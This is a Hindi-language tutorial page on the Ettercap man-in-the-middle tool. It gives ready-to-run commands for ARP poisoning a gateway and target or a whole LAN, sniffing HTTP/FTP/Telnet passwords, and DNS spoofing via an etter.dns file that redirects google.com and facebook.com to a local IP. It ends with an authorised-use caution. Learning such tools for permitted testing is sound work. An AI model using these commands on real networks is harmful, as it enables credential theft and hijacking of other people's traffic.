🐘 Ettercap - Man-in-the-Middle Attack Tool

🔍 MITM Attacks 📡 Network Sniffer 🕸️ ARP Poisoning

Category: 7️⃣ Sniffing & Spoofing

📝 Description

Ettercap एक शक्तिशाली मैन-इन-द-मिडिल (MITM) अटैक टूल है जो लैन (LAN) नेटवर्क पर काम करता है। यह ARP स्पूफिंग, DNS स्पूफिंग, और सेशन हाईजैकिंग जैसे अटैक कर सकता है। Ettercap लाइव कनेक्शन को स्निफ करता है, पासवर्ड चुराता है, और ट्रैफिक को रीडायरेक्ट कर सकता है। यह ग्राफिकल इंटरफेस (GUI) और कमांड लाइन (CLI) दोनों में उपलब्ध है।

विशेषता: Ettercap की सबसे बड़ी खासियत है इसकी ARP पॉइज़निंग क्षमता। यह नेटवर्क में दो होस्ट्स के बीच का ट्रैफिक खुद से होकर गुजार सकता है, जिससे वह सारा डेटा देख और मॉडिफाई कर सकता है।

📦 Installation

Kali Linux (पहले से इंस्टॉल):

ettercap -h

Ubuntu/Debian:

sudo apt update
sudo apt install ettercap-graphical -y

GitHub से इंस्टॉल:

git clone https://github.com/Ettercap/ettercap.git
cd ettercap
mkdir build
cd build
cmake ..
make
sudo make install

💻 Common Commands (उदाहरण सहित)

📌 Ettercap GUI शुरू करना:

sudo ettercap -G

👉 उदाहरण: ग्राफिकल इंटरफेस खुलता है। Sniff → Unified Sniffing → इंटरफेस चुनें (eth0/wlan0)।

🔹 1. ARP पॉइज़निंग अटैक (मैन-इन-द-मिडिल):

sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//

👉 उदाहरण: गेटवे (192.168.1.1) और टारगेट (192.168.1.100) के बीच MITM अटैक करता है। सारा ट्रैफिक आपसे होकर जाएगा।

🔹 2. सभी होस्ट्स के बीच ARP पॉइज़निंग:

sudo ettercap -T -M arp:remote // //

👉 उदाहरण: पूरे नेटवर्क के सभी होस्ट्स के बीच MITM अटैक करता है।

🔹 3. पासवर्ड स्निफिंग (HTTP, FTP, Telnet):

sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100// -P autoadd

👉 उदाहरण: -P autoadd प्लगइन से पासवर्ड ऑटोमेटिक कैप्चर होते हैं।

🔹 4. DNS स्पूफिंग:

sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100// -P dns_spoof

👉 उदाहरण: DNS रिक्वेस्ट को फेक रिस्पॉन्स देता है (etter.dns फाइल में कॉन्फ़िगर करें)।

🔹 5. नेटवर्क होस्ट्स स्कैन करना:

sudo ettercap -T -s

👉 उदाहरण: आसपास के सभी लाइव होस्ट्स की सूची बनाता है।

🔹 6. यूनिकास्ट स्निफिंग (ARP पॉइज़निंग के बिना):

sudo ettercap -T -M uni /192.168.1.100//

👉 उदाहरण: सिर्फ टारगेट का ट्रैफिक स्निफ करता है (प्रोमिस्क्युअस मोड में)।

🔹 7. प्लगइन्स की लिस्ट देखना:

sudo ettercap -T -P list

👉 उदाहरण: सभी उपलब्ध प्लगइन्स दिखाता है (autoadd, dns_spoof, grep, etc.)।

🔹 8. कैप्चर को फाइल में सेव करना:

sudo ettercap -T -M arp:remote // // -w capture.pcap

👉 उदाहरण: कैप्चर किए गए पैकेट्स को capture.pcap फाइल में सेव करता है।

🔹 9. फिल्टर के साथ स्निफिंग:

sudo ettercap -T -M arp:remote // // -F filter.ef

👉 उदाहरण: कस्टम फिल्टर लगाता है (पैकेट्स को मॉडिफाई या ब्लॉक करने के लिए)।

🔹 10. स्पेसिफिक पोर्ट पर स्निफिंग:

sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100// -p

👉 उदाहरण: -p सिर्फ TCP/UDP पैकेट्स स्निफ करता है।

🎯 Ettercap के प्लगइन्स:

autoadd: ऑटोमेटिक रूप से नए होस्ट्स को टारगेट में जोड़ता है
dns_spoof: DNS स्पूफिंग (etter.dns फाइल से कॉन्फ़िगर)
chk_poison: ARP पॉइज़निंग चेक करता है
grep: पैकेट्स में स्ट्रिंग सर्च करता है
isolate: होस्ट्स को नेटवर्क से आइसोलेट करता है
stp_man: STP (Spanning Tree Protocol) मैनिपुलेशन
rand_flood: रैंडम MAC एड्रेस से फ्लडिंग

🎯 Use Cases (उपयोग के तरीके)

ARP पॉइज़निंग (MITM): नेटवर्क ट्रैफिक को इंटरसेप्ट करना और देखना।
पासवर्ड स्निफिंग: HTTP, FTP, Telnet, IMAP, POP3 से पासवर्ड चुराना।
DNS स्पूफिंग: यूजर को फेक वेबसाइट पर रीडायरेक्ट करना।
सेशन हाईजैकिंग: HTTP सेशन कुकी चुराना।
नेटवर्क सिक्योरिटी ऑडिट: अपने नेटवर्क में ARP स्पूफिंग वल्नरेबिलिटी चेक करना।

⚙️ Key Features (मुख्य विशेषताएँ)

✔️ ARP पॉइज़निंग (Man-in-the-Middle)
✔️ DNS स्पूफिंग
✔️ पासवर्ड स्निफिंग (HTTP, FTP, Telnet, IMAP, POP3, etc.)
✔️ यूनिकास्ट और मल्टीकास्ट स्निफिंग
✔️ 20+ प्लगइन्स
✔️ कस्टम फिल्टर सपोर्ट
✔️ ग्राफिकल और कमांड लाइन इंटरफेस
✔️ लाइव कनेक्शन स्निफिंग
✔️ पैकेट कैप्चर और सेव
✔️ क्रॉस-प्लेटफॉर्म (Linux, macOS, Windows)
✔️ ओपन-सोर्स और फ्री

📌 Ettercap फिल्टर बनाना:

# filter.ef फाइल बनाने के लिए:
echo 'if (ip.proto == TCP && tcp.dst == 80) {
    msg("HTTP request detected\\n");
}' > filter.txt
etterfilter filter.txt -o filter.ef
sudo ettercap -T -M arp:remote // // -F filter.ef

👉 उदाहरण: HTTP रिक्वेस्ट डिटेक्ट करने वाला फिल्टर बनाता है।

📌 DNS स्पूफिंग कॉन्फ़िगरेशन (etter.dns):

# /etc/ettercap/etter.dns फाइल में डालें:
*.google.com A 192.168.1.100
www.facebook.com A 192.168.1.100
*.example.com A 192.168.1.100

👉 उदाहरण: google.com और facebook.com को 192.168.1.100 पर रीडायरेक्ट करता है।

📌 Ettercap vs Bettercap:

Ettercap: पुराना, स्टेबल, सिंपल, कमांड लाइन और GUI दोनों
Bettercap: नया, ज्यादा फीचर्स, HTTPS सपोर्ट, रियल-टाइम API, मॉड्यूलर
अनुशंसा: Ettercap सिंपल MITM और स्निफिंग के लिए, Bettercap एडवांस्ड अटैक के लिए।

📌 Ettercap के लिए सुझाव:

हमेशा ARP पॉइज़निंग से पहले IP फॉरवर्डिंग चालू करें: echo 1 > /proc/sys/net/ipv4/ip_forward
GUI मोड (-G) बिगिनर्स के लिए आसान है
पासवर्ड स्निफिंग के लिए -P autoadd प्लगइन का उपयोग करें
DNS स्पूफिंग के लिए etter.dns फाइल को कॉन्फ़िगर करें
प्रोडक्शन नेटवर्क पर सावधानी से उपयोग करें

🔗 Official Resources

Official Website: https://www.ettercap-project.org
GitHub Repository: https://github.com/Ettercap/ettercap
Documentation: Ettercap Docs
Kali Linux Tools: Kali Ettercap Page

🔧 Related Tools (समान उपकरण)

Bettercap: Ettercap का एडवांस्ड वर्शन
Wireshark: पैकेट एनालिसिस
tcpdump: कमांड लाइन पैकेट कैप्चर
arpspoof: ARP स्पूफिंग टूल (dsniff सुइट)
MITMf: फ्रेमवर्क फॉर MITM अटैक्स

⚠️ Important Note (सावधानी)

Ettercap एक शक्तिशाली MITM टूल है। इसका उपयोग केवल उन्हीं नेटवर्क पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के ARP पॉइज़निंग, पासवर्ड स्निफिंग, या DNS स्पूफिंग करना कानूनी अपराध है। हमेशा अपने खुद के नेटवर्क, CTF चैलेंज, या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। ARP पॉइज़निंग से नेटवर्क में अस्थिरता आ सकती है, इसलिए प्रोडक्शन नेटवर्क पर सावधानी से उपयोग करें।